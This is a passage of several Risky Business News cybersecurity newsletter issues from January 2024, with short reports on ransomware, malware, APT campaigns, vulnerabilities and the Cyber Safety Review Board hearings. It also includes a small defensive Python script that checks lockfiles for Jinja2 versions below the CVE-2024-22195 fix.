FTC bans another data broker: The US Federal Trade Commission has banned a US data broker from trading the precise location of American citizens. InMarket Media becomes the second US data broker to receive a ban of this kind. The FTC previously banned data aggregator Outlogic (formerly X-Mode Social) a week before.

CNMF anniversary: Cyber Command's CNMF (Cyber National Mission Force) recently celebrated its ten-year anniversary.

CISA pre-ransomware alerts: CISA has sent more than 1,200 notifications to US and international organizations in 2023 about early-stage ransomware activity on their networks. The agency has also sent 1,700 notifications to organizations that had systems vulnerable to common ransomware entry vectors. The two types of notifications were part of a pilot program CISA started in January 2023 to warn organizations of potential ransomware attacks. [Additional coverage in CISA's 2023 Year in Review report]

NCSC Cyber League: The UK NCSC has launched a new project named Cyber League that aims to bring together experts from the NCSC and the private sector to work on the biggest cyber threats facing the UK. The program is modeled after Industry 100 but is open to cybersecurity experts working at smaller companies.

WEF cybersecurity outlook: The World Economic Forum has published a report looking at recent cybersecurity trends and the cybersecurity posture of the world's nations. Some of the main conclusions are below.

  • Alignment between cyber and business is becoming more common.

  • The cyber-skills and talent shortage continues to widen at an alarming rate.

  • Cyber ecosystem risk is becoming more problematic.

  • There is growing cyber inequity between organizations that are cyber-resilient and those that are not.

  • Emerging technology will exacerbate long-standing challenges related to cyber resilience.

Sponsor section

In this Risky Business News sponsor interview, Tom Uren talks to Ivan Dwyer of Material Security about how it makes sense to view office productivity suites as an organisation's critical infrastructure.

Cybercrime and threat intel

Pompompurin sentenced: The former administrator of BreachForums has been sentenced to time served and 20 years of supervised release. Known online as Pompompurin, Conor Brian Fitzpatrick will serve the first two years in home confinement with GPS location monitoring and will have to submit to periodic polygraph tests. Fitzpatrick will also have to register as a sex offender after pleading guilty to possession of child sexual abuse material. The 21-year-old was initially arrested in March 2023, released on bond in July, and re-arrested in early 2024 after breaking his release conditions by using a VPN and the internet. The sentence came as a major surprise after the prosecution had sought a minimum 15-year prison sentence. [Additional coverage in DataBreaches.net]

Flint24 charged in the US: US authorities have indicted a Russian national named Aleksey Stroganov for harvesting and selling hundreds of millions of banking and credit card details. Stroganov was known by the hacker handle Flint24 and was part of a cybercrime syndicate that operated dozens of underground carding shops. He was detained by the FSB in 2020 after his group sold the data of Russian citizens, and his trial is still underway in Russia. One of Stroganov's accomplices, Tim "Key" Stigal, was also indicted in the US.

Pegasus research stands in court: A Mexican judge has allowed CitizenLab's research on the Pegasus spyware to stand in court as evidence [PDF]. The judgment comes after the organization's findings were recently contested by an army of no-name researchers and bot networks in support of oppressive regimes.

Ransomware via TeamViewer: Huntress researchers say they've seen several incidents where threat actors broke into corporate networks via TeamViewer connections and deployed ransomware.

Slug ransomware gang: A new ransomware gang has been spotted in the wild. Named Slug, the gang operates a dark web leak site, which is currently listing only one victim.

Dark web leak site for the new Slug ransomware

New npm malware: Twenty-eight malicious npm packages were discovered last week. Check out GitHub's security advisory portal for more details. One of them was this package, delivering a RAT on Windows systems.

Walmart fraud: ProPublica has a deep dive into how cybercriminals are abusing Walmart's financial services for fraud, scams, and money laundering—all while Walmart "has resisted taking responsibility while breaking promises to regulators and skimping on training."

2023 internet exploitation: GreyNoise has published its year-in-review report covering internet mass-exploitation trends for 2023.

Telegram crypto-scams: Roughly 40% of posts in Telegram channels dedicated to cryptocurrency were found to be fraudulent, according to a report from Russian security firm Angara Security.

Crypto-crime in 2023: Cryptocurrency transactions linked to illicit activity accounted for $24.2 billion in 2023, down from the $29.6 billion all-time peak of 2022. The 2023 figure represents 0.34% of all on-chain transaction volume for the year. Ransomware had a record year in 2023, but Chainalysis has not released an exact number. Ransomware payments accounted for $456.8 million the year before, in 2022. [More stats in Chainalysis' yearly report]

Chart showing cryptocurrency crime stats from 2023

Malware technical reports

New macOS malware: Jamf has discovered a new macOS malware strain hidden inside pirated macOS applications offered online. Researchers haven't named the malware, but they said it's similar to the old ZuRu malware from 2021, as spotted back then by Objective-See and Trend Micro.

DarkGate: Splunk's security team has published a report on DarkGate, one of today's most popular MaaS portals and malware loaders. S2W Talon also recently published a report on the same malware.

Zloader returns: The Zloader (Terdot, DELoader, Silent Night) malware botnet has returned to life after surviving a takedown attempt in April 2022. Security firm Zscaler says it has seen new versions of the malware since September 2023, 17 months after Microsoft and other security vendors seized its old servers. The new Zloader versions include better encryption and a better DGA for its command-and-control servers.

Parrot TDS: Palo Alto Networks looks at Parrot TDS, a botnet that redistributes traffic from hacked sites to malware operations. The botnet has been active since October 2021, and most of its infected sites run a CMS like Joomla, WordPress, or others.

ThreeAM (3AM) ransomware: French cybersecurity firm Intrinsec has linked the new ThreeAM (3AM) ransomware operation to the Royal ransomware, an offshoot of the old Conti gang.

"We assess with a low to medium confidence that, although ThreeAM intrusion sets seem to be a less sophisticated subgroup of Royal, displaying lesser operational security, it could make an impact with a high rate of attacks."

Diamond model for the 3AM ransomware

Sponsor Section

A deep dive into what's new with Material Security's Phishing Protection product: New detections, response UX boosters, and more actionable reports.

APTs, cyber-espionage, and info-ops

UNC3886: Google's Mandiant division says that a VMWare vulnerability patched in October of last year was secretly exploited in the wild by Chinese hackers since late 2021. Mandiant linked the attacks to a group it tracks as UNC3886. The group has a long history of going after devices that cannot run EDR security products, allowing their attacks to go undetected for longer. When it patched the vulnerability (CVE-2023-34048) in October, VMWare wasn't aware of active exploitation but released patches even for end-of-life devices.

Chart showing the stages of an UNC3886 attack using the recent VMWare bugs

Vulnerabilities, security research, and bug bounty

German software engineer fined: A German court has fined a software developer €3,000 for using hardcoded credentials he found in a software's source code to access the vendor's database. The developer reported the hardcoded credentials to the vendor and the fact that the database was leaking details on 700,000 of its customers. Instead of thanking the developer, the vendor filed a complaint with the police. A German judge ruled that even if the credentials were exposed in cleartext, the developer was in the wrong for using them. [German coverage in WordFilter/English summary here]

MiraclePtr: Google says the MiraclePtr security feature it added to Chrome has mitigated 57% of use-after-free vulnerabilities in the browser's privileged processes, seven percentage points over the 50% its engineers estimated in 2022 when they first developed the technology.

Ivanti zero-days update: Security researchers from Assetnote have found new ways to exploit the recent Ivanti zero-days (CVE-2023-46805 & CVE-2024-21887) on older versions of the Connect Secure firmware. According to GreyNoise, exploitation of these zero-days has extended from a Chinese APT to cryptomining botnets. According to Volexity, there are now more than 2,100 compromised hosts.

Chrome bug: Exodus has published a technical write-up on CVE-2024-0517, an out-of-bounds write code execution in Chrome's V8 engine that was patched last week.

Jinja2 vulnerability: There's a major Jinja2 vulnerability that's said to impact thousands of Python projects. Tracked as CVE-2024-22195, the vulnerability is an XSS bug. Since Jinja2 is a template engine, you'll find it all over the place and in all sorts of flavors, often as an indirect dependency rather than something a project declares itself.
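The practical problem with a bug like this is inventory, since Jinja2 tends to arrive transitively through Flask, Ansible, Sphinx and the like. The script below is an added example, not part of the Jinja2 project; it takes the fixed release from the upstream changelog rather than the newsletter (Jinja2 3.1.3 is the first release that closes CVE-2024-22195) and scans several projects' `pip freeze` style lockfiles for pins below that version, normalising names so `Jinja2`, `jinja2` and `JINJA2` are treated as the same distribution. The lockfile contents are constructed for the example.

```python
"""Find projects pinned to a Jinja2 release below the fix (added example)."""
import re

# distribution (normalised name) -> first release carrying the fix.
# 3.1.3 for CVE-2024-22195 is taken from the Jinja changelog, not the newsletter.
FIXED = {"jinja2": (3, 1, 3)}


def normalize(name):
    """PEP 503 name normalisation: case-insensitive, runs of '-', '_' and '.' collapse to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def parse_version(version):
    """'3.1.2' or '3.1.2.post1' -> (3, 1, 2); leading numeric parts only, enough for pin comparison."""
    nums = []
    for part in version.split("."):
        m = re.match(r"\d+", part)
        if not m:
            break
        nums.append(int(m.group()))
    return tuple(nums)


def parse_freeze(text):
    """Parse 'name==version' lines (pip freeze / requirements.txt); comments and other specifiers are ignored."""
    pins = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        m = re.match(r"([A-Za-z0-9][A-Za-z0-9._-]*)\s*==\s*([0-9][^\s;]*)", line)
        if m:
            pins[normalize(m.group(1))] = m.group(2)
    return pins


def vulnerable_pins(lockfiles):
    """lockfiles: dict project -> freeze text. Returns project -> (name, pinned version) for unfixed pins."""
    findings = {}
    for project, text in lockfiles.items():
        for name, version in parse_freeze(text).items():
            fixed = FIXED.get(name)
            if fixed and parse_version(version) < fixed:
                findings[project] = (name, version)
    return findings


# Constructed lockfiles for three imaginary projects.
SAMPLE_LOCKFILES = {
    "billing-api": "Flask==3.0.0\nJinja2==3.1.2\nMarkupSafe==2.1.3\n",
    "reports": "jinja2==3.1.3  # upgraded after the advisory\nansible-core==2.16.2\n",
    "docs-site": "Sphinx==7.2.6\nJINJA2==3.0.3\n",
}

if __name__ == "__main__":
    for project, (name, version) in vulnerable_pins(SAMPLE_LOCKFILES).items():
        print(f"{project}: {name}=={version} is below {'.'.join(map(str, FIXED[name]))}")
```

Run it against a full `pip freeze` of each deployed environment rather than against hand-written requirements files: a requirements.txt that never mentions Jinja2 says nothing about whether Flask pulled it in, and the freeze output is where the transitive pin actually shows up.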

Infosec industry

New tool—BlueTuxedo: Software engineer Jake Hildreth has released BlueTuxedo, a tool to find and fix misconfigurations in Active Directory-integrated DNS. Last year, Hildreth also released Locksmith, a tool to detect and fix common misconfigurations in Active Directory Certificate Services.

New tool—LogBoost: Varonis security researcher Joseph Avanzato has released LogBoost, a tool designed to help DFIR operators parse and enrich logs.

New tool—Pulse-Meter: Security researcher Rich Warren has released Pulse-Meter, a tool to parse Ivanti Connect Secure system snapshots for new IOCs related to the exploitation of the CVE-2023-46805 and CVE-2024-21887 zero-days.

Tool update—TweetFeed: After going down for several months, the TweetFeed website is back. The site collects IOCs shared on Twitter.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq talk about how Stuxnet was an 'inevitability gamechanger,' how much we now know about the operation, and how much the Dutch government should have known at the time.

Risky Biz News: Congress considers making CSRB permanent and more independent and transparent

19 January 2024 at 00:30

This newsletter is brought to you by Panther, the scalable detection-as-code based SIEM. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

Following a hearing of the Senate Homeland Security and Governmental Affairs Committee, US lawmakers said they're considering legislation that would make the DHS Cyber Safety Review Board (CSRB) a permanent organization in the US cybersecurity space.

Created under a May 2021 White House executive order, the CSRB was set up as a cyber analog to the National Transportation Safety Board (NTSB), the independent agency that investigates transportation accidents.

It was established in the aftermath of the SolarWinds supply chain attack as an independent board tasked with investigating cybersecurity-related incidents that affect the US government and issuing recommendations to improve security measures across both the US public and private sectors.

Since its inception, the CSRB has published two reports, one covering the Log4Shell vulnerability and another covering the Lapsus$ hacking group.

Three cybersecurity experts invited to testify at the hearing argued that while the CSRB was a step in the right direction, the Board was somewhat ineffective, and its reports were superficial.

Some blamed the Board's current problems on the CSRB's lack of subpoena powers, which meant that the CSRB would often have to put reports together using legally sanitized statements rather than raw incident response data.

No subpoena powers also means the Board can't force companies and individuals to cooperate and (still) needs to lean on its subjects' goodwill and cooperation to get the answers it desires.

"I think that the big challenge that we have with a lack of subpoena power on the current Board is that the real answers are often found about three layers deeper than the information that, as far as I'm aware now, is being provided to the Board," Tarah Wheeler, CEO at Red Queen Dynamics, told the HSGAC.

John Miller, Senior Vice President of Policy, Trust, Data, and Technology and General Counsel at the Information Technology Industry Council (ITI), was the only one among the three to oppose the idea of giving the Board subpoena powers.

"I think that it's premature to say that a board focused on investigating incidents needs subpoena power to get information until we know what those regulations say and what information is already going to be mandatorily required to be provided to CISA and the government. I think that the other factors that I would keep in mind are, one, CISA has long had a partnership mission and collaborative mission with the IT sector and all critical infrastructure sectors in areas such as information sharing and otherwise. We are concerned subpoena authority puts CISA, particularly, if that's where the CSRB continues to live, in a more adversarial position with the private sector."

Miller also brought up the other major current issues with the CSRB, which he says lacks the transparency and independence of the far more successful NTSB, a topic also raised by Trey Herr, Director of the Cyber Statecraft Initiative at the Atlantic Council.

The two argued that the procedures around how CISA decides what the CSRB investigates are still unclear. While the Log4j and Lapsus$ topics were important, the CSRB has often skipped on looking at incidents with a broader impact on national security.

It took quite a lot of pressure from US Senators and the private sector to convince CISA to have the CSRB look at the recent Storm-0558 hack of Microsoft infrastructure from June 2023.

"The Board provides the potential for a long range lens. Not just a reactive moment, but potentially picking historical incidents that have far greater consequence for the design and operation of these systems than we understand in the moment," Herr said.

Wheeler also touched on the Board's membership, which she argued should be staffed with dedicated investigators rather than industry figureheads, especially those from the private sector, which may end up investigating competitors.

"Many individuals on the CSRB are beloved and respected, but they do have full-time jobs, and they do not have the time, freedom, and authority to conduct independent, thorough investigations."

Wheeler also asked lawmakers not to introduce classified information and require clearances to sit on the CSRB.

"Lack of transparency around how people are currently nominated to the CSRB and how the Board selects which investigations they pursue may decrease trust in its impartiality. In addition, forcing CSRB members to hold clearances would drastically limit the pool of potential investigators in the already massive deficit of US cyber security talent."

The HSGAC hearing was conducted at the request of the White House, which asked Congress to codify the CSRB as part of the US National Cybersecurity Strategy last year [PDF, page 16].

Breaches, hacks, and security incidents

DDoS attacks on Swiss sites: Switzerland's cybersecurity agency has confirmed that a wave of DDoS attacks has caused temporary outages of several government portals. Swiss officials have blamed the attack on NoName, a Russian-linked hacktivist group. The attacks coincided with Ukrainian President Zelenskyy's attendance at the World Economic Forum's annual meeting.

Kyivstar attack: Dutch-headquartered telecommunications group Veon expects to lose around $95 million in the aftermath of Russia's cyberattack on Kyivstar, Ukraine's largest mobile operator. Veon says the figure represents lost revenue and the loyalty measures Kyivstar had to pay out to customers following its prolonged outage. Hackers from Russia's GRU military intelligence agency breached Kyivstar on December 12 and wiped thousands of the telco's servers.

Socket crypto-heist: Cryptocurrency platform Socket temporarily halted operations of its Bungee trading platform after a threat actor stole $3.3 million in assets. The company believes the attacker exploited one of its wallets. Socket restarted Bungee after fixing the issue and said it was working on a compensation plan for affected users. [Additional coverage in CoinDesk]

GitHub rotates keys: Code hosting platform GitHub has rotated several keys, including the GPG key it uses to sign commits made through its web interface and API, and keys used to encrypt customer secrets for GitHub Actions, Codespaces, and Dependabot. The company rotated the keys after receiving a bug report about a vulnerability that could have allowed threat actors to gain access to them. GitHub says it did not find evidence that the bug was exploited prior to being patched.

Naz.API leak: A threat actor has leaked more than 104GB of infostealer logs and credential-stuffing lists. According to security researcher Troy Hunt, the data contains more than 71 million unique email addresses and 100 million unique passwords. Named Naz.API, the leaked data was added to Hunt's Have I Been Pwned database.

Forum post advertising the Naz.API leak
Image: Troy Hunt

General tech and privacy

Samsung S24 to get 7 years of updates: Samsung has launched its new line of S24 smartphones, and the company has committed to providing seven years of software and security updates. Previously, the company's smartphones were only supported for five years. Samsung joins Google as the only vendors to provide seven years of security updates for their Android smartphones.

Chrome Incognito Mode update: Google is changing the text that appears when users open Chrome's Incognito Mode. The change comes after the company settled a 2020 lawsuit for tracking users while in Incognito Mode. The new text informs users that their activity will be tracked by the company.

"Others who use this device won't see your activity, so you can browse more privately. This won't change how data is collected by websites you visit and the services they use, including Google. Downloads, bookmarks, and reading list items will be saved. Learn more"

YouTube making millions off climate disinformation: A new study has found that YouTube is making millions of dollars a year from running ads on climate change disinformation videos. The study also found a new trend in climate change disinformation, where instead of denying that climate change happens, videos claim that clean energy solutions don't work and that the world should embrace more fossil fuels. [Additional coverage in CBC]

Yahoo fined in France: French privacy watchdog CNIL has fined Yahoo's EMEA branch €10 million for failing to comply with the EU GDPR regulations. CNIL says Yahoo ignored user choices and continued to use tracking cookies for the users of its Yahoo Mail service. The agency says Yahoo also ignored users who withdrew their consent through the Yahoo Mail interface.

Facebook tracking: A Consumer Reports study found that users generally have their data collected and sent to Facebook's ad platform by roughly 2,230 companies, on average. Some users even had their data collected by more than 7,000 companies.

ACSC phone security guide: The Australian Cyber Security Centre has published a guide on how business leaders can keep their devices secure. The guide comes with several recommendations, including the advice to turn devices off and on on a daily basis. Similar advice was shared by the makers of the mobile operating system GrapheneOS a week earlier.

State of AI in the Cloud: Cloud security firm Wiz has published its State of AI in the Cloud 2024. According to Wiz, AI is rapidly gaining ground in cloud environments, with over 70% of organizations now using managed AI services.

Wiz chart showing some of their findings

Government, politics, and policy

FTC joins CAPE: The US Federal Trade Commission has joined the Global Cooperation Arrangement for Privacy Enforcement (Global CAPE), an international organization that facilitates cooperation and assistance in privacy and data security investigations.

US warns of Chinese drones: CISA and the FBI have published a joint security advisory warning US companies and federal agencies against the use of Chinese drones. The two agencies describe Chinese drones as a national security threat and claim they could be used to collect and spy on US critical infrastructure sites. US officials cite recent Chinese laws that grant the government the power to coerce companies into helping its espionage efforts.

Election interference: The Chair of the US Senate Intel Committee has urged CISA to recommit to fighting foreign malign influence ahead of the upcoming 2024 US Presidential Elections. Sen. Mark Warner has cited a recently declassified intelligence report describing an uptick in disinformation efforts from US adversaries. Sen. Warner filed an amicus brief in support of CISA in its Supreme Court case, where several Republican states are trying to limit the agency's role in combating election disinformation.

Sponsor section

In this Risky Business News sponsor interview, Tom Uren talks to Ken Westin, Field CISO at Panther, about how the rise of cloud and hybrid IT architectures requires a new type of SIEM.

Cybercrime and threat intel

npm dead repos: A study from Aqua Security estimates that the real number of deprecated npm packages is around 21.2%, rather than the official 8.4%. The company bases the new figure on the practice of some developers who remove or archive their libraries when confronted with a security flaw, rather than fixing it.

Microsoft IR guide: Microsoft has published incident response guides for its Entra and 365 services.

"These guides contain the artifacts that Microsoft Incident Response hunts for and uses daily to provide our customers with evidence of Threat Actor activity in their tenant."

Water sector IR guide: CISA, the FBI, and the EPA have released an incident response guide for organizations in the water and wastewater management sector.

BEC increase: BEC attacks grew by 137% last year, according to an Abnormal Security report.

AI scams targeting Romania: Cyber Geeks has published a report detailing an online scam using AI-generated content targeting Romanians with investment opportunities in one of the country's main energy providers. The scam is abusing YouTube ads and has been going on since October of last year. Google has refused to take any action against it despite numerous reports from Romanian cybersecurity vendors and experts—including this reporter. The Romanian company whose brand is being abused has also warned customers not to fall victim to the scam.

TA866: Proofpoint has seen the return of TA866, a financially motivated threat actor the company first documented last year.

Mimo: AhnLab researchers have published a profile on Mimo, a threat actor active since 2022. The group operates by using vulnerabilities to breach servers, where it installs cryptominers and proxyware. AhnLab says the group has recently also started installing ransomware (named Mimus) on hacked servers.

NoName057(16): Netscout researchers have published a profile on NoName057(16), a pro-Kremlin hacktivist group that has recently been involved in a long list of DDoS attacks against what it calls "pro-Ukrainian organizations," whether they are Western government agencies or just random shoe stores.

Punchmade shop: A rapper named Punchmade Dev, known for singing about the cybercrime lifestyle, has apparently launched a card shop. Yes, I am just as shocked as you are. According to infosec reporter Brian Krebs, Punchmade is a young man named Devon Turner from Lexington, Kentucky. [Additional coverage in KrebsOnSecurity]

Screenshot of the Punchmade card shop

Malware technical reports

Monster Stealer: CyFirma researchers have published a report on Monster Stealer, a new infostealer advertised on Telegram by a Russian threat actor that gained popularity last year by releasing free infostealer logs on their channel.

Chae$ 4.1: Morphisec has published an analysis of Chae$ 4.1, the latest version of Chaes, a malware strain designed to infect Chrome browsers and exfiltrate data from users of Latin American online marketplaces since 2020.

macOS malware: SentinelOne looks at how three macOS infostealers (CherryPie, KeySteal, and Atomic InfoStealer) are evading XProtect signatures.

New botnet: Cado Security researchers have discovered a new botnet that infects Docker instances to deploy a cryptominer and 9Hits, an app that allows the attacker to monetize the hacked server's bandwidth.

Kuiper ransomware: Trellix researchers have published a breakdown of the Kuiper ransomware. According to Trellix, the ransomware has evolved quite a lot since its launch in September of last year. There are similar reports on this new ransomware strain from Stairwell and BishopFox as well.

Timeline of the Kuiper ransomware evolution
Image: Trellix

Sponsor Section

A short demo on how to use Panther's Detections-as-Code (DaC) platform for cryptominer investigations.

APTs, cyber-espionage, and info-ops

Mint Sandstorm: Iranian APT group Mint Sandstorm is conducting spear-phishing campaigns aimed at compromising high-profile individuals working on Middle Eastern affairs at universities and research organizations in Europe and the US. Mint Sandstorm attempted to masquerade as known journalists seeking expert input on the Israel-Hamas war. According to Microsoft, the group tried to infect targets with a new, custom backdoor called MediaPl. The Mint Sandstorm overlaps with other Iranian threat actors tracked as APT35 and Charming Kitten and is linked to Iran's Islamic Revolutionary Guard Corps (IRGC) military intelligence service.

ColdRiver: Google's TAG security team has observed the ColdRiver APT group conducting new hacking operations targeting Western officials. The recent wave of attacks employed a new custom backdoor named Spica, a deviation from the group's typical account compromise and disinformation efforts. In early December 2023, the British government publicly linked the group to Center 18, a cybersecurity division inside Russia's FSB intelligence agency.

Vulnerabilities, security research, and bug bounty

Toyota network compromise: Security researcher Eaton Zveare broke into the network of a Toyota insurance broker through the company's premium rate calculator.

HVCI bypass: Software engineer Satoshi Tanda has published a technical write-up on CVE-2024-21305, a bypass of the Hypervisor-Protected Code Integrity (HVCI) security feature in Windows.

Oracle CPU: The quarterly Oracle security updates are out, with patches for 387 vulnerabilities.

Outlook bug: Varonis researchers have published a write-up on CVE-2023-35636, a new way to steal NTLM hashes via Outlook.

TensorFlow bug: Praetorian researchers have identified a series of CI/CD misconfigurations that, when combined, can lead to compromise of TensorFlow releases. Google has fixed all issues.

RBI bypass: Security researchers at SpecterOps have devised a method to break and bypass Remote Browser Isolation (RBI), a security technology that isolates a user's browsing experience inside a remote cloud VM, lowering security risks.

Drupal security updates: The Drupal team has released a security update for its CMS, fixing a bug that could allow attackers to crash sites via their comment fields.

Hidden Juniper bugs: According to watchTowr Labs, Juniper has secretly patched four vulnerabilities in JunOS without disclosing the bugs or filing for a CVE.

"Given this, it is interesting that Juniper did not find at least the missing authentication vulnerability to be severe enough to justify an out-of-cycle advisory, nor to register CVE or mention them in the release notes (although they did deem them important enough to request we delay our usual and industry-aligned 90-day VDP timeline)."

WhatsApp leak: ZenGo co-founder and CTO Tal Be'ery has disclosed a vulnerability that allows threat actors to determine how a user is using the WhatsApp instant messaging service. The bug allows attackers to determine how many devices a user has registered and if they are using the WhatsApp web interface. The attacker only needs a user's phone number, and the technique works even if the victim blocks the attacker's phone number. Be'ery disclosed his findings after Meta declined to patch the issue.

Tweet from Tal Be'ery

Infosec industry

New tool—Application Block: Malwarebytes has made its Application Block tool free as part of its ThreatDown offering.

New tool—LVE Repository: A group of academics and software engineers have released LVE Repository, a portal that documents and tracks vulnerabilities and exposures of large language models (LVEs).

New tool—Cybersecurity Incident Tracker: Security researcher Andrew Hoog has put together Cybersecurity Incident Tracker, a portal that tracks cybersecurity incidents reported via SEC 8K forms.

Industry moves: Email security company has appointed Marc van Zadelhoff as its new CEO. Former CEO Peter Bauer will remain a member of the Board.

Tianfu Cup 2023: Ant Group's Lightyear Lab has won the 2023 edition of the Tianfu Cup, China's most prestigious hacking contest. The competition took place in November 2023 after organizers canceled the contest's 2022 edition with no explanation. The cancellation came after several reports that bugs found during the 2021 edition were used in the wild by Chinese state-sponsored hackers days after the contest. Sixty-two teams participated in the 2023 edition, which featured new rules and a lot more Chinese products on the target list. Despite the change, the highest prizes were still offered for Western products, while contest organizers shared very little information about what products were targeted or successfully hacked. [Additional coverage in Natto Thoughts]

Tianfu Cup results

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq talk about how Stuxnet was an 'inevitability gamechanger,' how much we now know about the operation, and how much the Dutch government should have known at the time.

Risky Biz News: Cybercrime crew infects 172,000 smart TVs and set-top boxes

17 January 2024 at 00:30

This newsletter is brought to you by Panther, the scalable detection-as-code based SIEM. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

A cybercrime operation is believed to have infected at least 172,000 smart TVs and set-top boxes with malware that carries out DDoS attacks.

Named Bigpanzi, the group has been active since at least 2015 and appears to target Spanish and Portuguese-speaking users across Latin America.

According to Chinese security firm QiAnXin, Bigpanzi built its botnet through social-engineering tactics, such as spreading apps to view pirated content, apps to enhance TV viewing experiences, and backdoored firmware updates.

Once installed, the apps and firmware updates would ensnare infected devices into the Bigpanzi botnet and carry out attacks at the operator's behest.

A graph showing how the Bigpanzi group operates
Image: QiAnXin

QiAnXin says Bigpanzi is the same group behind the Pandora botnet discovered by Russian security firm Dr.Web in September 2023.

While Chinese researchers say they tracked roughly 172,000 infected devices per week after they managed to hijack two of the botnet's command-and-control domains, they also estimate Bigpanzi's real size to be in the realm of millions. They believe this because they only intercepted a small section of the botnet's C&C infrastructure and because of the ephemeral nature of smart TVs and set-top boxes, which are not always powered on and connected to Bigpanzi servers.

Researchers say that most of the botnet's infected devices are located in Brazil and are either Android-based smart TVs or TV set-top boxes that run on eCos, an open-source operating system for embedded devices.

Bigpanzi (Pandora) is the latest in a long list of modern-day botnets that specifically target smart TVs and set-top boxes, such as Ares, the Lemon Group, and BADBOX. The last two, and the most recent ones, primarily focus on ad fraud rather than DDoS attacks, which makes Bigpanzi somewhat stand out.


Breaches, hacks, and security incidents

Wise Lending crypto-heist: The Wise Lending DeFi platform has lost $464,000 worth of crypto-assets after an attacker exploited a vulnerability in its smart contract.

Fake Romanian DB leak: A post on the XSS hacking forum claiming to sell the data of more than 21 million Romanians has proven to be fake, according to Bit Sentinel's Andrei Avadanei.

Cloud provider returns stolen data: Cloud service provider Wasabi has returned stolen patient data that was stored on its servers to New York hospital chain North Star Health Alliance. The data had been stored on Wasabi's servers by the LockBit ransomware gang, which hacked the hospital in August 2023. North Star sued the ransomware group and obtained a court order to regain control over the gang's servers. [Additional coverage in HealthcareInfoSecurity]

General tech and privacy

ICO to look at AI scraping: The UK's privacy watchdog is looking at the legality of AI companies scraping web content to train generative models. The initiative will analyze if the practice breaks property or contract laws and its compliance with existing data protection laws.

Crypto firm shuts down after NY fine: Cryptocurrency trading platform Genesis Global shut down operations after receiving an $8 million fine in the US state of New York. Officials fined the company for failing to implement anti-money laundering and cybersecurity programs. The company shut down its website hours after receiving the fine. [Additional coverage in The Record]

Google to let EU users unlink services: Google will let European users unlink its services from one another. Some examples:

  • When Search, YouTube, and Chrome are not linked services, your recommendations in Search, like "What to watch" and your Discover feed will be less personalized.

  • When Search and Maps are not linked services, Reservations made on Search won’t appear in Google Maps.

Government, politics, and policy

Turkey secretly bans VPNs: The Turkish government has secretly ordered local internet service providers to block access to 16 VPN services. The block was enforced in December, and some of the blocked services include TunnelBear, Surfshark, and CyberGhost. Turkey has had strict control over its internet for years. Besides blocking access to pornographic sites, the country has also blocked access to news sites critical of the country's president, opposition websites, and pro-Kurdish content. The country joins China, Iran, and Russia in formally blocking VPN services. [Additional coverage in FT]

DOD Cyber Red Teams: The US Department of Defense has updated the rules and responsibilities for its cyber red teams [PDF].

UK-Ukraine security cooperation: The British and Ukrainian governments have signed a security cooperation agreement. The document covers both military and cyber matters.

Russia approves IoT protocol: The Russian Technical Regulation and Metrology Agency (Rosstandart) has approved the LoRaWAN protocol as the country's official Internet of Things (IoT) protocol. [Additional coverage in Cnews]

Telegram deanonymization: The Russian government claims it developed an AI system named Comrade Major (Товарищ майор) that can deanonymize the owners of Telegram channels. The system was developed by Russian software company T.Hunter and is expected to be formally launched this year or in 2025. Russian officials say they plan to use the new system for law enforcement. [Additional coverage in Izvestia]

A BlueSky post from Kevin Rothrock

Sponsor section

In this Risky Business News sponsor interview, Tom Uren talks to Ken Westin, Field CISO at Panther, about how the rise of cloud and hybrid IT architectures requires a new type of SIEM.

Cybercrime and threat intel

Tether is a favorite with scammers: The Tether (USDT) cryptocurrency has become the favorite money laundering medium used by pig-butchering groups, according to a recent report from the United Nations Office on Drugs and Crime (UNODC). The UN says the currency is widely used due to its widespread adoption and relatively easy access. Besides pig-butchering scams, Tether is also popular with task scam groups, a new type of scam where users are recruited to perform various online tasks in exchange for commissions. [Additional coverage in FT]

State of Software Supply Chain Security: ReversingLabs has published the 2024 State of Software Supply Chain Security Report, a document outlining major trends in software supply chain security from last year and how they may impact the current year's threat landscape.

  • A 400% annual increase in threats on the PyPI platform, with more than 7,000 instances of malicious PyPI packages discovered in the first three quarters of 2023. The vast majority of these were classified as "infostealers."

  • More than 40,000 instances of leaked or exposed development secrets across the major package managers (npm, PyPI, and RubyGems).

  • Instances of malicious npm packages in the first three quarters of 2023 decreased by 43% compared with malicious npm packages identified in all of 2022.

  • Npm accounted for 77%, or 31,000, of the more than 40,000 secrets detected across these four open-source platforms.

Rise in Telegram cryptominers: Russian security firm Dr.Web is seeing a rise in crypto-mining trojans hidden in pirated software spread via Telegram.

Inferno Drainer: Group-IB estimates that the operators of the Inferno Drainer phishing service stole more than $80 million worth of assets from victims. The service shut down in November.

SonicWall exposure: More than 178,000 SonicWall firewalls across the world are still unpatched and vulnerable to one of two major vulnerabilities disclosed ten months ago, in March 2023 (CVE-2022-22274 and CVE-2023-0656). The figure represents more than three-quarters of all internet-exposed SonicWall firewalls, according to a scan conducted by security firm BishopFox. Researchers warn that attacks could be imminent after proof-of-concept code is published online.

Table showing how SonicWall devices are vulnerable and to what CVEs

Malware technical reports

Atomic Stealer: eSentire security researcher Russian Panda has analyzed AMOS, or Atomic Stealer, one of the first infostealers specifically created for macOS systems. Atomic is sold for the whopping price of $3,000/month, which makes it one of the most expensive malware strains offered today.

Pure malware family: ANY.RUN researchers have published a report on all the malware strains that are part of the Pure malware family. This includes PureMiner (cryptominer), PureLogs (infostealer), PureLogs Loader (loader), and PureCrypter (crypter, and probably the best known of the four).

DarkGate: South Korean security firm S2W Talon has published a report on DarkGate, one of today's most popular MaaS portals and malware loaders.

Androxgh0st: The FBI and CISA have published a report on Androxgh0st, a botnet malware specialized in attacking web and cloud infrastructure.

Sponsor Section

A short demo on how to use Panther's Detections-as-Code (DaC) platform for cryptominer investigations.

APTs, cyber-espionage, and info-ops

